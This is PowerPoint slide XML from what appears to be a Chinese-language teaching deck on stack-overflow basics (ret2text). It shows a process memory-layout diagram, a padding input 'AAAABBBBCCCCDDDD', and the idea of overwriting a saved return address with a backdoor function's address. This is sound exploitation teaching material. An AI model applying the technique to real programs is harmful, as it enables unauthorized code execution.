                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2D2E9AD-C011-483F-87F8-DDA863C32FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317147" y="3683561"/>
            <a:ext cx="3315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输入：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AAAABBBBCCCCDDDD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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55" name="Shape 650">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922F5A2B-BAA9-4911-B65E-E35FB23619DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465955" y="5130172"/>
            <a:ext cx="3181983" cy="287478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AAAA</a:t>
            </a:r>
            <a:endParaRPr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56F136B0-BD15-4B67-8EB9-C4EEC188F73C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82587536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A93B0BAB-2F16-46A9-97CC-90D4C00E5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6426558" y="399245"/>
            <a:ext cx="3883021" cy="6246254"/>
            <a:chOff x="4584879" y="992499"/>
            <a:chExt cx="5738969" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9289E-73FE-49AF-B6F4-0900DF5D5FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584879" y="992499"/>
              <a:ext cx="5738969" cy="5601480"/>
              <a:chOff x="4897550" y="888136"/>
              <a:chExt cx="1363200" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B570F3-A096-4B70-BE99-92F5DB78D599}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2C601E-D1C3-428E-AEAC-1E25E4FDE7A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2417D00D-B973-4A6F-B7B9-5A3DDEB7F146}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A56EF6-4FB8-4E94-A5C1-50DF5761DCB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707381BE-9F57-472D-A9D6-4B032B784029}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B8DF59-E4C5-4FD2-A237-586D621D29B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E931A1D2-481B-4BB9-891B-84E7E8BCFE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3361338"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9893FB29-F450-49FA-BC66-8C71333CB434}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3635538"/>
                <a:ext cx="1363200" cy="598837"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F4E38F-7208-4D9C-B943-2280EFFD6742}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56582F-1891-49BA-9F55-08C133B125D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EAAC46-FCCD-4964-980A-AAFF78D1D986}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82D5E77-3B99-4ED7-9D49-E74A5C908844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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backdoor_addr</a:t>
              </a:r>
              <a:endParaRPr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31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66390BC5-F328-44DF-B6AE-7DBFD4626842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10467614" y="1017485"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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22386C21-3C35-4D7A-8DE1-7548ACAA8C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10555224" y="5471183"/>
            <a:ext cx="683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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB105-A862-43D0-B8CE-5D59E5E670DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6426556" y="1489762"/>
            <a:ext cx="3" cy="4262596"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7620100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB87570-AA3A-41C6-9354-F57105467229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426556" y="4335166"/>
            <a:ext cx="3883021" cy="33981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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA77EA5-89D3-4070-BA8F-BF1776AF1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426555" y="5612333"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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backdoor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in ELF</a:t>
            </a:r>
            <a:endParaRPr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7D519EE-BF54-4641-887A-627D5353173E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="30651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篡改栈帧上的返回地址为程序中已有的后门函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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已有的后面函数在进程的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Text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段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E8DF81C6-7849-475A-BAB9-9D552070BB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38430723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A93B0BAB-2F16-46A9-97CC-90D4C00E5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7271389" y="399245"/>
            <a:ext cx="3883021" cy="6246254"/>
            <a:chOff x="4584879" y="992499"/>
            <a:chExt cx="5738969" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9289E-73FE-49AF-B6F4-0900DF5D5FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584879" y="992499"/>
              <a:ext cx="5738969" cy="5601480"/>
              <a:chOff x="4897550" y="888136"/>
              <a:chExt cx="1363200" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B570F3-A096-4B70-BE99-92F5DB78D599}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2C601E-D1C3-428E-AEAC-1E25E4FDE7A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2417D00D-B973-4A6F-B7B9-5A3DDEB7F146}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A56EF6-4FB8-4E94-A5C1-50DF5761DCB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707381BE-9F57-472D-A9D6-4B032B784029}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B8DF59-E4C5-4FD2-A237-586D621D29B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E931A1D2-481B-4BB9-891B-84E7E8BCFE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3361338"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9893FB29-F450-49FA-BC66-8C71333CB434}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3635538"/>
                <a:ext cx="1363200" cy="598837"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F4E38F-7208-4D9C-B943-2280EFFD6742}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56582F-1891-49BA-9F55-08C133B125D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EAAC46-FCCD-4964-980A-AAFF78D1D986}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82D5E77-3B99-4ED7-9D49-E74A5C908844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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backdoor_addr</a:t>
              </a:r>
              <a:endParaRPr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31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66390BC5-F328-44DF-B6AE-7DBFD4626842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11312445" y="1017485"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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22386C21-3C35-4D7A-8DE1-7548ACAA8C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11400055" y="5471183"/>
            <a:ext cx="683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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB105-A862-43D0-B8CE-5D59E5E670DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7271387" y="1489762"/>
            <a:ext cx="3" cy="4262596"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7620100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Shape 628">
            <a:extLst>
